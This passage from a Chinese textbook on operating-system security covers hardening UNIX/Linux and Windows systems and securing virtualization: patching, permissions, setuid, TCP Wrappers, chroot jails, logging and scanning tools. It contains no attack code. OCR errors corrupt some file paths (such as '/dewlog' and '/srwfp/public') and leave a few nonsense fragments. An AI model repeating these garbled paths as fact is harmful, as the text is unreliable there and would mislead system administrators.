对 自己 网 站 进行 备份 的 站 长 丢失 了 网 站 的 所 有 内 容 和 数据 ， 给 站 长 和 主机 提供 商都 造成 了 严重 
损失 。 另 外 的 例子 是 ， 许 多 只 进行 现场 备份 的 组 织 由 于 IT 中 心 的 火灾 或 者 洪水 就 丢失 了 全 部 
的 数据 。 所 以 一 定 要 对 风险 进行 适当 的 评估 。 


12.6 Linux/UNIX 安全 


前 面 已 经 讨论 了 增强 操作 系统 安全 性 的 过 程 ， 即 谨慎 的 安装 、 配 置 和 管理 。 现 在 我 们 要 介 
绍 这 个 过 程 中 与 UNIX 和 Linux 系统 相关 的 特定 方面 。 除 去 本 节 中 一 般 意义 上 的 指导 ， 我 们 也 
会 在 第 25 章 中 Linux 安全 机 制 部 分 给 出 一 个 更 为 详细 的 讨论 。 
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目前 有 许多 可 用 的 资源 帮助 这 些 Linux 系统 管理 员 ， 包 括 像 [NEME10] 这 样 的 文章 ， 像 
“Linux 文档 项 目 ” 这 样 的 在 线 资源 ， 以 及 像 “NSA 一 一 安全 配置 指南 ”这 样 的 特定 的 系统 加 
固 指南 。 这 些 资源 都 可 以 作为 系统 安全 规划 过 程 中 的 参考 来 协助 确认 系统 的 安全 需求 。 


12.6.1 补丁 管理 


确保 系统 和 应 用 都 打上 了 最 新 的 安全 补丁 是 被 广泛 接受 的 维护 系统 安全 的 重要 方法 。 

现代 UNIX 和 Linux 发 布 版 通常 都 包含 了 自动 化 工具 来 下 载 和 安装 包括 安全 更 新 在 内 的 
软件 更 新 。 及 时 更 新 可 以 尽 可 能 地 减少 系统 因 已 知 漏洞 而 变 得 脆弱 的 时 间 。 例 如 ，Red Hat, 
Fedora 及 CentOS 包含 了 up2date 或 者 yum; SuSE 包含 了 yast; Debian 则 使 用 apt-get， 这 要 求 
.我 们 必须 为 自动 更 新 设置 一 个 定时 作业 。 无 论 该 发 布 版 使 用 什么 样 的 更 新 工具 ， 配 置 它 们 来 定 
时 安装 关键 的 安全 补丁 都 是 十 分 重要 的 。 

正如 先前 所 提 到 的 ， 变 更 可 控 ( change-controlled) 的 系统 不 应 该 允许 自动 更 新 ， 因 为 这 可 
能 会 引起 系统 不 稳定 。 这 类 系统 应 该 在 测试 环境 下 验证 全 部 的 补丁 包 ， 随 后 再 将 其 部 署 到 真实 
环境 当中 。 


12.6.2 ”应 用 和 服务 配置 


UNIX 和 Linux 上 应 用 和 服务 的 配置 普遍 使 用 单独 的 文件 来 实现 ， 每 一 个 应 用 和 服务 都 有 
独立 的 配置 文件 。 全 系统 的 配置 信息 一 般 位 于 /etc 目录 下 ， 或 者 位 于 应 用 的 安装 目录 中 。 在 每 
个 用 户 的 home 目录 中 ， 用 户 个 人 的 配置 可 以 覆盖 隐藏 在 “点 ”文件 中 系统 的 默认 配置 。 这 些 
文件 的 名 字 、 格 式 、 用 法 因 系 统 版 本 和 应 用 的 不 同 而 各 不 相同 。 因 此 ， 负 责 加 固 系统 中 这 些 配 
置 的 管理 员 应 该 接受 过 适当 的 培训 并 熟悉 它们 。 

通常 ， 这 些 文 件 可 以 用 文本 编辑 器 进行 编辑 ， 发 生 的 任何 更 改 会 在 系统 重启 后 生效 ， 或 者 
也 可 以 通过 向 系统 发 送信 号 要 求 相关 进程 重新 初始 化 来 生效 。 现 在 的 系统 通常 为 这 些 配 置 文件 
提供 一 个 图 形 界 面 来 方便 新 手 管理 员 的 管理 工作 。 这 种 管理 方法 比较 适合 只 拥有 几 个 系统 的 小 
型 站 点 。 对 于 拥有 庞大 系统 的 组 织 ， 则 应 该 部 署 某 种 形式 的 中 央 管 理 设备 ， 有 一 个 中 央 配 置 仓 
库 来 自动 定制 和 分 发 它们 管理 的 系统 。 

增强 系统 安全 性 最 重要 的 措施 是 禁用 服务 ， 尤 其 是 禁用 不 需要 的 远程 访问 服务 ， 并 且 确 
保 所 有 的 服务 和 应 用 根据 相应 的 安全 指导 进行 了 合适 的 配置 。 我 们 将 在 25.5 节 深入 讨论 这 个 
问题 。 


126.3 用户、 组 和 权限 


正如 我 们 在 4.5 节 和 25.3 节 描 述 的 ，UNIX 和 Linux 系统 实现 了 对 所 有 文件 系统 资源 的 访 
问 控 制 ， 不 仅 包括 文件 和 目录 ， 也 包括 设备 、 进 程 、 内 存 等 大 多 数 系统 资源 。 如 图 4-6 所 示 ， 
每 一 个 用 户 、 组 和 其 他 人 对 每 一 个 资源 的 权限 都 分 为 读 、 写 、 执 行 三 种 。 这 些 可 以 通过 chmod 
命令 来 设置 。 一 些 系统 也 支持 通过 访问 控制 列表 来 扩展 文件 属性 ， 通 过 指定 用 户 或 组 的 列表 上 
的 每 一 条 记录 的 权限 来 实现 更 灵活 的 访问 控制 ， 这 种 访问 控制 列表 通常 使 用 getfacl 和 setfacl 
命令 来 设置 。 这 些 命令 可 以 用 来 设 定 用 户 或 组 对 资源 的 操作 权限 。 

依据 惯例 ， 用 户 账户 和 组 的 相关 信息 保存 在 etc/passwd 目录 和 /etc/group 目录 ， 现 代 操 作 
系统 也 可 以 通过 LDAP 或 NIS 等 工具 导 人 这 些 信 息 。 这 些 信息 的 来 源 、 相 关 认 证 证 书 的 来 源 
是 在 PAM (可 插 拔 认证 模块 ) 配置 过 程 中 指定 的 ， 通常 使 用 /etc/pam.d 目录 。 

为 了 分 开 对 系统 中 信息 和 资源 的 访问 ， 用 户 通常 被 分 配 到 合适 的 组 并 给 予 其 所 需 的 访问 权 
限 。 组 的 数量 和 分 配 应 该 在 系统 安全 规划 过 程 中 确定 ， 随 后 配置 到 合适 的 信息 仓库 中 ， 仓 库 或 
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者 在 本 地 的 /ete 目录 中 ， 或 者 在 一 些 中 央 数 据 库 中 。 此 时 ， 任 何 默认 或 系统 提供 的 通用 账户 都 
应 该 被 检查 ， 如 果 不 需要 就 删除 掉 。 其 他 需要 却 不 必 登 录 的 账户 ， 应 该 禁止 其 登录 权限 ， 相 关 
的 密码 和 认证 证 书 也 要 同时 删除 。 

加 固 UNIX 和 Linux 系统 的 指导 通常 也 建议 更 改 关键 目录 和 文件 的 访问 权限 ， 以 进一步 限制 
对 它们 的 访问 。 能 更 改 用 户 (setuid) 或 者 更 改组 (setgid) 的 程序 是 攻击 者 的 主要 目标 。 正 如 我 们 
在 4.5 节 和 25.3 节 讨论 的 ， 无 论 谁 来 执行 这 些 程序 ， 都 需要 超级 用 户 权限 ， 或 者 需要 访问 属于 


特权 用 户 组 的 资源 。 这 种 程序 的 软件 漏洞 很 容易 被 攻击 者 利用 来 提升 其 权限 ， 这 称 为 本 地 攻击 


(local exploit)。 网 络 服务 器 中 的 软件 漏洞 被 攻击 者 触发 并 利用 ， 称 为 远程 攻击 (remote exploit). 

人 们 普遍 认为 通过 setuid 更 改 为 超级 用 户 (root) 的 程序 应 该 尽 可 能 少 。 因 为 访问 系统 中 
的 某 些 资源 需要 超级 用 户 权限 ， 因 此 这 类 程序 不 能 完全 没有 。 管 理 用 户 登录 的 程序 ， 或 者 将 网 
络 服务 绑 定 到 特权 端口 的 程序 就 是 很 好 的 例子 。 然 而 ， 其 他 那些 仅仅 为 了 程序 员 编程 方便 而 更 
改 到 root 权限 的 程序 ， 完 全 可 以 通过 setgid 将 其 更 改 到 特权 组 ， 比 如 显示 系统 状态 或 者 发 邮件 
的 程序 。 系 统 加 固 指导 可 能 会 建议 在 特定 系统 上 ， 更 改 或 移 除 这 类 不 必要 的 程序 。 


126.4 ”远程 访问 控制 


考虑 到 人 们 对 远程 攻击 的 关注 ， 对 仅 有 的 那些 需要 远程 访问 的 服务 进行 访问 限制 是 十 分 重 
要 的 。 正 如 第 9 章 所 言 ， 使 用 一 个 外 围 防火 墙 可 以 提供 这 类 功能 。 然 而 ， 基 于 主机 的 防火 墙 和 
网 络 访问 控制 机 制 也 可 以 提供 额外 的 防护 。UNIX 和 Linux 系统 对 上 面 几 种 选择 都 是 支持 的 。 

TCP Wrappers 库 和 tcpd 守护 进程 提供 了 一 种 网 络 服务 器 可 能 会 用 到 的 机 制 ， 即 轻 量 级 服 
务 可 能 会 被 tcpd 进行 封装 ， 之 后 代替 它 监 听 请 求 。 在 对 请 求 进 行 响应 和 处 理 前 ，tcpd 会 根据 
配置 的 访问 策略 来 检查 请 求 是 否 被 允许 ， 被 拒绝 的 请 求 会 被 记录 下 来 。 较 复杂 或 者 重量 级 的 服 
务 会 使 用 TCP Wrappers 库 和 相同 的 策略 配置 文件 来 将 这 种 功能 安排 进 自身 的 连接 管理 代码 中 。 
这 些 文件 有 /etc/hosts.allow 和 /etc/hosts.deny， 可 以 根据 需要 的 策略 来 设置 。 

有 几 种 主机 防火 墙 程序 也 可 以 使 用 。Linux 系统 最 初 使 用 iptables 程序 来 配置 netfilter AK 
模块 。 这 种 方式 虽然 复杂 ， 但 还 是 提供 了 可 理解 的 状态 包 过 滤 、 监 控 和 修改 功能 。 大 多 数 系统 
是 通过 提供 管理 工具 来 生成 常见 的 配置 并 且 选 择 哪 些 服务 可 以 访问 系统 。 考 虑 到 运行 程序 和 编 
辑 配置 文件 所 需要 的 技能 和 知识 ， 除 非 有 非 标准 (non-standard) 的 需求 ， 否 则 还 是 应 该 使 用 这 
些 管理 工具 。 


12.6.5 “日 志 记录 和 日 志 滚 动 


大 多 数 应 用 都 会 不 同 程度 地 记录 上 日志， 记录 程度 从 “调试 (debugging)” (内 容 最 多 ) 到 
“无 (none)”。 通 常 最 好 选择 中 间 程 度 的 设 定 。 另 外 ， 我 们 不 应 该 假设 默认 的 设置 是 合适 的 。 

此 外 ,许多 应 用 允许 我 们 指定 一 个 专用 文件 来 记录 应 用 的 事件 数据 ， 或 者 也 可 以 使 用 系统 
日 志 将 数据 写 人 到 /dev/log (参见 25.5 节 )。 如 果 你 希望 用 一 种 统一 的 、 中 央 化 的 方式 来 处 理 日 
志 ， 那 么 通常 较 好 的 做 法 是 把 应 用 的 日 志 写 到 /dewlog。 然 而 ， 需 要 注意 的 是 ，logrotate ( 25.5 
节 有 所 讨论 ) 可 以 用 来 滚动 系统 中 的 任何 日 志 ， 不 论 它 是 syslogd 写 的 ， 还 是 Syslog-NG 写 的 ， 
抑或 是 个 人 应 用 程序 写 的 。 


12.6.6 ”使 用 chroot 监牢 的 应 用 安全 


一 些 网 络 服务 并 不 要 求 访 问 全 部 的 系统 ， 而 是 只 要 求 访问 有 限 的 一 些 数 据 文件 和 目录 。 
FTP 就 是 这 类 服务 的 一 个 常见 例子 。 它 提供 了 在 一 个 特定 目录 下 上 传 和 下 载 文件 的 功能 。 如 果 
这 类 服务 具有 全 系统 的 访问 权限 ,一旦 它 被 攻破 ,那么 攻击 者 很 有 可 能 访问 和 破坏 其 他 地 方 的 
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SHE. UNIX 和 Linux 系统 提供 了 一 种 机 制 ， 即 将 这 类 服务 运行 在 chroot 监牢 中 ， 此 模式 限制 
了 服务 对 系统 的 可 见 性 ， 使 其 只 能 看 到 系统 的 一 部 分 。 这 种 功能 通过 使 用 chroot 系统 调用 来 实 
现 。chroot 系统 调用 通过 将 “/” 目 录 映 射 到 其 他 目录 (例如 /srwfp/public) 来 将 进程 局 限 在 文 
件 系统 的 一 个 子 集中 。 对 于 被 限制 的 服务 chroot 监牢 中 的 所 有 东西 都 和 “真实 ”的 目录 一 样 ， 
例如 /srv/ftp/public/etc/myconfigfile 表现 为 /etc/myconfigfile。chroot 监牢 外 部 的 文件 (例如 /srv/ 
www 或 /etc) 是 根本 不 可 见 并 且 无 法 访问 到 的 。 

因此 这 种 技术 有 助 于 控制 被 破坏 或 者 被 劫持 的 服务 所 带 来 的 影响 。 这 种 方法 的 主要 缺点 是 
增加 了 复杂 性 : 许多 文件 (包括 服务 器 上 的 所 有 可 执行 库 )、 目 录 以 及 设备 都 需要 拷贝 进 chroot 
监牢 中 。 虽 然 有 许多 详细 的 指导 描述 了 如 何 将 各 种 不 同 的 程序 “ 关 和 人 监牢 "， 但 决定 需要 将 什 
么 东西 放 人 监牢 可 以 让 服务 器 工作 得 更 好 依然 是 一 件 麻烦 事 。 

调试 遇 到 问题 的 监牢 内 的 应 用 也 是 一 件 困难 的 事情 。 即 使 某 个 应 用 显 式 地 支持 这 种 特性 ， 
它 在 监牢 中 也 可 能 表现 出 莫名 其 妙 的 行为 。 另 外 也 应 该 注意 ， 如 果 被 关 入 监牢 的 程序 是 以 超级 
用 户 权限 运行 的 ， 那 么 它 能 毫 不 费力 地 “打破 ”这 个 监牢 。 尽 管 如 此 ， 将 网 络 服务 关 人 监牢 依 
REBAR, AAT HN. 


12.6.7 ”安全 性 测试 


类 似 “ NSA 一 一 安全 配置 指南 ”这 类 的 系统 加 固 指 导 包 含 了 一 些 可 以 遵循 的 UNIX 和 
Linux 系统 检查 清单 。 

也 有 一 些 可 用 的 商业 和 开源 工具 可 以 进行 系统 安全 性 扫描 和 漏洞 检测 。 其 中 一 个 较为 出 名 
的 是 Nessus。 它 最 初 是 一 款 开源 工具 ， 在 2005 年 被 商业 化 了 ， 目 前 有 一 些 受 限制 的 免费 版 本 
可 用 。Tripwire 是 一 款 著名 的 文件 完整 性 检测 工具 ， 它 维护 了 一 个 受 监控 文件 的 散 列 值 数据 库 ， 
它 能 够 检测 任何 由 恶意 攻击 导致 的 或 者 不 正确 的 管理 和 更 新 导致 的 文件 更 改 。 它 最 初 也 是 开源 
工具 ， 现 在 有 商业 和 自由 软件 两 种 版 本 。Nmap 网 络 扫描 器 是 另外 一 种 著名 的 可 部 署 的 评估 工 
有 具 ， 它 主要 着 眼 于 识别 和 剖析 目标 网 络 中 的 主机 及 其 提供 的 网 络 服务 。 


12.7 Windows 安全 


我 们 现在 来 讨论 安全 地 安装 、 配 置 和 管理 Windows 系统 的 一 些 问题 。 许 多 年 来 ，Windows 
系统 在 所 有 系统 中 占据 了 极 大 的 份额 ， 因 此 它们 也 受到 了 攻击 者 的 特别 关注 ， 因 此 也 需要 有 
相应 的 安全 措施 来 应 对 这 些 挑战 。 本 章 中 我 们 描述 的 一 般 过 程 仍然 适用 于 为 Windows 系统 提 
供 合适 的 安全 等 级 。 除 去 本 节 提 供 的 一 般 意义 的 指导 之 外 ， 在 后 续 的 第 26 章 还 会 深入 探讨 
Windows 系统 的 安全 机 制 。 

另外 ， 对 于 Windows 管理 员 来 说 ， 也 有 许多 可 用 的 资源 可 以 帮助 他 们 管理 系统 。 包 括 诸 
如 [SYMA07] 这 样 的 报告 、 微 软 安全 工具 和 检查 清单 这 样 的 在 线 资源 ， 以 及 “NSA 一 一 安全 
配置 指南 ”这 种 特定 的 系统 加 固 指 导 。 


12.7.1 补丁 管理 


Windows Update 服务 和 Windows Server Update 服务 能 够 帮助 对 微软 软件 进行 定期 维护 ， 
应 该 正确 地 配置 和 使 用 这 些 服务 。 许 多 其 他 的 第 三 方 应 用 也 提供 自动 更 新 支持 ， 对 于 选 定 的 应 
用 ， 也 应 该 启用 这 些 自动 更 新 。 


12.7.2 用户 管理 和 访问 控制 
Windows 系统 的 用 户 和 组 以 安全 ID (SID) 来 定义 。 这 类 信息 在 单 系统 的 安全 账户 管理 器 
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(Security Account Manager, SAM) 中 存储 和 使 用 。 也 可 以 在 属于 同一 个 域 的 组 中 统一 管理 ， 信 
息 是 由 使 用 LDAP 协议 的 中 央 活 动 目录 (Active Directory) 系统 提供 的 。 大 多 数 拥有 多 个 系统 
的 组 织 都 使 用 域 来 管理 它们 ， 这 些 系统 也 可 以 在 域内 的 任何 用 户 上 实施 常见 的 策略 。 我 们 会 在 
26.1 节 深 入 探讨 Windows 安全 架构 。 

Windows 实现 了 对 系统 资源 的 任意 访问 控制 ， 例 如 文件 、 共 享 内 存 、 命 名 管道 。 访 问 控 
制 列 表 上 记录 了 特定 SID 的 访问 权限 ， 这 个 SID 可 能 是 个 人 用 户 ， 也 可 能 是 用 户 组 。Windows 
Vista 和 后 续 的 系统 还 包含 了 强制 的 完整 性 控制 。 所 有 的 对 象 ， 例 如 进程 和 文件 ， 以 及 所 有 的 
用 户 都 被 标记 为 低 、 中 、 高 、 系 统 四 个 等 级 。 这 样 一 来 ， 当 有 数据 写 人 对 象 时 ， 系 统 会 首先 确 
保 当 前 操作 者 的 完整 性 标签 比 被 写 人 的 对 象 高 或 者 相等 。 这 就 实现 了 我 们 在 13.2 节 讨 论 的 某 
种 形式 的 Biba 完整 性 模型 ， 即 对 不 受信 任 的 远程 代码 试图 修改 本 地 资源 (例如 正 浏 览 器 ) 的 
行为 保持 特别 关注 。 

Windows 系统 也 定义 了 系统 范围 内 可 以 给 予 用 户 的 特权 。 包 括 备 份 计算 机 (要求 覆 盖 正 常 
的 访问 控制 来 获取 完全 的 备份 )， 或 者 改变 系统 时 间 。 一 些 特 权 是 危险 的 ， 攻 击 者 可 以 利用 它 
们 来 破坏 系统 ， 因 此 授权 时 需要 十 分 小 心 。 其 他 权限 相对 比较 温和 ， 可 以 授予 大 多 数 或 者 所 有 
用 户 。 

对 于 任何 系统 来 说 ， 加 固 系 统 配 置 都 包括 深入 限制 系统 中 用 户 和 组 的 权限 和 特权 。 因 为 在 
访问 控制 列表 中 给 出 的 拒绝 访问 设置 具有 更 高 的 优先 级 ， 因 此 你 可 以 显 式 地 设置 一 条 拒绝 记录 
来 阻止 对 某 些 资源 的 未 授权 访问 ， 即 使 要 拒绝 的 用 户 是 有 权 访 问 的 用 户 组 的 一 员 。 

当 需 要 在 共享 资源 上 访问 文件 时 ， 共 享 和 NTFS 权限 的 组 合 可 以 用 来 提供 额外 的 安全 性 和 
粒度 。 例 如 ， 你 可 以 拥有 共享 的 全 部 权限 ， 却 对 其 中 的 文件 只 拥有 读 权 限 。 如 果 在 共享 资源 上 
启用 基于 访问 的 枚 举 ， 那 么 它 能 自动 隐藏 某 一 用 户 无 权 看 到 的 所 有 对 象 。 这 对 包含 了 许多 用 户 
个 人 目录 的 共享 文件 夹 十 分 有 用 。 

我 们 也 应 该 确保 拥有 管理 员 权 限 的 用 户 仅仅 在 需要 的 时 候 才 使 用 该 权限 ， 而 在 其 他 的 时 候 
则 以 普通 用 户 的 身份 访问 系统 。Vista 和 后 续 的 操作 系统 提供 的 用 户 账户 控制 (UAC) 功能 有 助 
于 实现 这 种 需求 。 这 些 系 统 也 提供 了 低 特权 服务 ( Low Privilege Service Accounts) 可 用 于 长 期 
使 用 (long-lived) 的 服务 进程 的 能 力 ， 例 如 文件 、 打 印 和 DNS 这 些 不 需要 提升 权限 的 服务 。 


12.7.3 ”应 用 和 服务 配置 


与 UNIX 和 Linux 系统 不 同 ，Windows 系统 的 许多 配置 信息 是 统一 放 在 注册 表 当 中 的 。 注 
册 表 是 一 个 存储 键 和 值 的 数据 库 ， 可 以 被 系统 中 的 应 用 查询 和 解释 。 l 

如 果 在 特定 的 应 用 中 改变 了 配置 ， 这 些 变化 会 以 键 和 值 的 形式 保存 在 注册 表 中 。 这 种 方 
法 隐藏 了 管理 员 的 管理 细节 。 此 外 ， 注 册 表 的 键 也 可 以 通过 注册 表 编 辑 器 来 更 改 。 这 种 方法 在 
做 大 规模 更 改 的 时 候 更 为 实用 ， 例 如 那些 加 固 指导 中 推荐 的 更 改 。 这 些 改变 也 可 能 会 被 记录 下 
来 ， 之 后 推送 到 网 络 中 的 日 志 系 统 中 。 


12.7.4 其 他 安全 控制 工具 


由 于 以 Windows 系统 为 目标 的 恶意 软件 占据 了 恶意 软件 数量 的 绝 大 多 数 ， 在 这 类 系统 上 
安装 和 配置 反 病 毒 、 反 间谍 、 个 人 防火 墙 以 及 其 他 攻击 检测 和 人 处理 软 件 是 必 不 可 少 的 。 对 于 有 
网 络 连接 的 系统 ， 这 些 是 显而易见 的 要 求 ，[SYMA13] 这 样 的 报告 也 显示 了 攻击 的 高 发 态势 。 
然而 ，2010 年 的 震 网 (Stuxnet) 攻击 显示 ， 即 便 是 使 用 可 移 除 媒介 进行 的 独立 系统 升级 也 是 脆 
弱 的 ， 同 样 也 应 该 受到 保护 。 

目前 这 代 Windows 操作 系统 拥有 基本 的 防火 墙 和 恶意 代码 处 置 能 力 ， 但 它们 应 该 很 少 被 
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人 们 用 到 。 然 而 ,许多 组 织 发 现 一 个 或 多 个 商业 产品 应 该 会 增强 防护 和 处 理 恶 意 代码 的 能 力 。 
人 们 关心 的 一 个 问题 是 不 同 反 病毒 产品 之 间 的 相互 影响 。 当 规划 和 安装 这 些 产 品 来 识别 和 检测 
攻击 的 时 候 应 该 十 分 小 心 ， 要 确保 产品 之 间 是 相互 兼容 的 。 

如 果 有 需求 ，Windows 系统 也 支持 广泛 的 加 密 功能 。 包 括 使 用 加 密 文件 系统 (EFS) 来 加 
密 文件 和 目录 ， 使 用 BitLocker 以 AES 方式 加 密 整个 磁盘 ， 等 等 。 


12.7.5 ”安全 性 测试 


像 “NSA 一 一 安全 配置 指南 ”这 样 的 系统 加 固 指导 也 提供 了 不 同 版 本 Windows 的 安全 检 
查 清单 。 

也 有 许多 商业 和 开源 工具 可 以 对 Windows 系统 进行 系统 安全 扫描 和 漏洞 检测 。“ 微 软 基线 
安全 分 析 器 ”( Microsoft Baseline Security Analyzer) 就 是 一 个 简单 免费 日 易 用 的 工具 ， 它 由 在 
通过 检查 系统 是 否 安装 了 推荐 更 新 以 及 是 否 符合 微软 推荐 的 设 定 来 改善 中 小 型 商业 机 构 的 安全 
性 。 大 规模 的 组 织 最 好 使 用 一 个 更 大 的 中 心 化 和 商业 化 的 安全 分 析 套 件 。 


12.8 虚拟 化 安全 


虚拟 化 指 的 是 使 用 某 些 软件 对 计算 资源 进行 抽象 的 技术 ， 因 此 它 运行 在 称 为 虚拟 机 (VMD) 
的 仿真 环境 当中 。 目 前 有 多 种 形式 的 虚拟 化 ， 本 节 我 们 主要 关注 的 是 全 虚拟 化 。 它 允许 在 虚拟 
硬件 之 上 运行 多 个 完整 的 操作 系统 实例 ， 由 管理 程序 (hypervisor) 管理 操作 系统 对 实体 硬件 资 
源 的 访问 。 使 用 虚拟 化 技术 的 好 处 是 相 比 运行 单一 操作 系统 而 言 ， 运 行 多 个 操作 系统 实例 可 以 
更 高 效 地 利用 物理 硬件 资源 。 这 种 好 处 在 提供 各 种 虚拟 化 服务 器 方面 尤其 明显 。 虚 拟 化 也 能 为 
在 一 台 物 理 机 上 运行 多 个 独立 的 不 同类 型 的 操作 系统 和 相关 软件 提供 支持 ， 这 在 客户 端 系统 中 
更 为 常见 。 l 

在 虚拟 化 系统 中 产生 了 许多 额外 的 安全 考虑 ， 这 既是 由 于 多 个 操作 系统 同时 运行 ， 也 是 
由 于 在 操作 系统 内 核 及 其 安全 服务 之 下 又 新 增 了 一 层 虚拟 环境 和 管理 程序 所 致 。[CLEE09] 给 
出 了 由 于 使 用 虚拟 化 技术 而 产生 的 安全 相关 问题 的 调查 ， 在 这 里 我 们 将 会 深入 讨论 其 中 的 一 些 
问题 。 


12.8.1 虚拟 化 方案 


一 个 仿真 的 虚拟 化 环境 有 许多 创建 方式 ， 包 括 应 用 虚拟 化 ， 如 Java 虚拟 机 环境 ， 人 允许 
针对 某 一 环境 编写 的 应 用 程序 可 以 在 其 他 的 环境 中 运行 。 也 包括 全 虚拟 化 ， 即 多 个 完整 的 操 
作 系 统 实 例 并 行 运行 。 每 一 个 客户 操作 系统 以 及 系统 内 的 应 用 都 运行 在 自己 的 虚拟 硬件 和 虚 
拟 机 上 。 这 些 客机 操作 系统 ( guest OS) 被 管理 程序 (hypervisor) 管理 ， 或 者 被 虚拟 机 监视 
# (Virtual Machine Monitor, VMM) 管理 。 管 理 程序 的 作用 是 协调 各 个 客机 操作 系统 对 于 
真实 硬件 资源 的 访问 ， 例 如 CPU、 内存、 硬盘 、 网 络 和 其 他 附属 设备 。 管 理 程序 也 为 运行 在 
真实 硬件 上 的 操作 系统 提供 相似 的 硬件 接口 ， 这 使 
得 其 对 于 客户 操作 系统 及 其 应 用 几乎 不 需要 什么 修 
改 。 最 近 几 代 CPU 为 管理 程序 提供 了 特殊 的 指令 ， 
使 用 它们 可 以 改善 管理 程序 的 运行 效率 。 

全 虚拟 化 系统 可 以 进一步 分 为 本 地 虚拟 化 系统 和 
主机 虚拟 化 系统 。 本 地 虚拟 化 系统 指 的 是 管理 程序 直 
接 运 行 在 底层 硬件 之 上 ， 如 图 12-2 所 示 。 主 机 虚拟 
化 系统 指 的 是 管理 程序 仅仅 是 运行 在 底层 硬件 之 上 的 图 12-2 本 地 虚拟 化 安全 层次 
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主机 操作 系统 的 一 个 应 用 程序 ， 如 图 12-3 所 示 。 本 地 虚拟 化 系统 通常 在 服务 器 中 见 到 ， 因 为 
服务 器 的 目标 是 提高 硬件 的 使 用 效率 。 一 般 认 为 本 地 
虚拟 化 系统 更 为 安全 ， 因 为 相 比 主机 虚拟 化 而 言 ， 其 
上 增加 的 额外 层次 更 少 。 主 机 虚拟 化 系统 在 客户 端 系 
统 中 更 为 常见 ， 因 为 它们 还 要 在 主机 操作 系统 中 运行 
其 他 应 用 程序 ， 使 用 虚拟 机 的 目的 是 想 使 用 其 他 操作 
系统 版 本 和 其 他 类 型 的 应 用 。 因 为 这 种 方法 在 主机 操 
作 系 统 之 上 ， 其 他 应 用 程序 的 旁边 又 增加 了 一 层 管理 
程序 ， 所 以 可 能 会 导致 安全 隐患 。 

在 虚拟 化 系统 中 ， 可 用 的 硬件 资源 必须 被 多 个 客 图 12-3 主机 虚拟 化 安全 层次 
机 操作 系统 所 共享 。 这 些 资 源 包括 CPU、 内 存 、 硬 
盘 、 网 络 以 及 其 他 附属 设备 。CPU 和 内 存 通常 在 这 些 客机 操作 系统 中 进行 划分 ， 按 需 调度 。 
硬盘 也 可 能 被 划分 ， 每 个 客机 操作 系统 都 有 一 块 独占 的 硬盘 资源 。 或 者 每 一 个 客机 操作 系统 会 
创建 一 个 虚拟 硬盘 ， 虚 拟 硬盘 在 用 户 视角 看 起 来 是 以 全 系统 的 一 块 物 理 硬盘 的 形态 存在 ， 然 而 
在 外 部 看 起 来 却 是 一 个 底层 文件 系统 上 的 硬盘 镜像 。 光 盘 或 者 USB 这 些 附 属 设备 通常 一 次 只 
分 配给 一 个 客机 操作 系统 。 对 于 网 络 的 访问 则 有 几 种 可 选 的 方案 。 客 机 操作 系统 可 以 直接 访问 
系统 的 网 卡 ， 由 管理 程序 协调 共享 接口 的 访问 ; 或 者 管理 程序 为 每 个 客机 操作 系统 实现 一 个 虚 
拟 网 卡 ， 根 据 需 要 在 不 同 客机 之 间 进 行路 由 。 后 一 种 方法 更 加 高 效 和 常见 ， 因 为 不 同 客机 操作 
系统 间 的 流量 不 必 通 过 外 部 网 络 连 接 进行 转发 。 正 如 我 们 在 第 9 章 讨论 的 ， 这 些 流 量 不 受 网 络 
监视 器 的 控制 ， 的 确 存 在 一 些 安 全 问题 。 因 此 ， 如 果 有 必要 ， 这 类 系统 需要 一 个 基于 主机 的 控 
测 器 。 


12.8.2 ”虚拟 化 安全 问题 


[CLEE09] 和 [SCAR11] 都 给 出 了 一 些 因 使 用 虚拟 化 系统 而 产生 的 安全 问题 ， 内 容 主要 
包括 ; 

© 客机 操作 系统 独立 ， 即 确保 运行 在 某 一 客机 操作 系统 内 的 程序 只 访问 分 配给 该 系统 的 

资源 ， 而 不 会 与 其 他 客机 操作 系统 的 数据 或 者 管理 程序 的 数据 进行 交互 。 

© 客机 操作 系统 是 被 管理 程序 所 监控 的 ， 管 理 程序 有 权力 访问 任何 客机 操作 系统 的 程序 

和 数据 。 管 理 程序 的 这 种 访问 行为 必须 是 安全 的 和 可 信任 的 。 

© 虚拟 化 环境 安全 ， 尤 其 是 攻击 者 可 能 想 要 看 到 和 修改 的 镜像 和 快照 的 管理 。 

这 些 安全 问题 都 可 以 作为 我 们 已 经 讨论 过 的 加 固 操 作 系 统 和 应 用 的 扩展 。 如 果 某 种 操作 
系统 和 应 用 配置 直接 运行 在 真实 硬件 上 时 是 脆弱 的 ， 那 么 它 运行 在 虚拟 环境 中 可 能 更 脆弱 。 如 
果 该 系统 被 攻破 了 ， 那 么 攻击 者 至 少 有 能 力 攻击 它 附 近 的 系统 ， 无 论 是 其 他 的 客机 操作 系统 还 
是 硬件 上 的 真实 操作 系统 。 与 管理 程序 亲自 监控 所 有 本 地 运行 的 程序 相 比 ， 虚 拟 化 环境 的 使 用 
可 以 通过 进一步 隔离 网 络 流量 来 改善 安全 性 。 然 而 ， 虚 拟 化 环境 和 管理 程序 的 存在 也 可 能 降低 
安全 性 ， 因 为 这 些 环境 可 能 存在 安全 漏洞 ， 这 些 漏 洞 可 能 允许 客机 操作 系统 的 程序 访问 管理 程 
序 ， 进 而 访问 到 其 他 客机 操作 系统 。 我 们 在 6.8 节 讨 论 的 “虚拟 机 逃脱 (VM escape)” 就 是 这 
样 一 个 例子 。 虚 拟 化 系统 也 可 以 通过 快照 功能 挂 起 一 个 正在 运行 的 客机 操作 系统 ， 保 存 成 镜 
像 ， 在 一 段 时 间 后 重新 运行 ， 甚 至 可 以 换 到 另外 一 个 系统 中 来 运行 ;如果 攻击 者 能 够 访问 或 修 
改 这 个 镜像 ， 那 么 他 就 能 危害 到 镜像 内 数据 和 程序 的 安全 。  . 

因此 正如 我 们 前 面 所 讲 的 ， 虚 拟 化 系统 的 使 用 增加 了 一 个 我 们 需要 额外 关心 的 层次 。 加 固 
虚拟 化 系统 意味 着 需要 加 固 额 外 增加 的 这 一 层 。 除 去 加 固 每 个 客机 操作 系统 和 应 用 之 外 ， 虚 拟 
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化 环境 和 管理 程序 也 要 加 固 。 


12.8.3 ”加 固 虚拟 化 系统 


[SCAR11] 针对 拟 化 安全 给 出 了 适当 的 指导 ， 它 指出 使 用 虚拟 化 技术 的 组 织 或 机 构 应 该 : 

e 仔细 规划 虚拟 化 系统 的 安全 。 

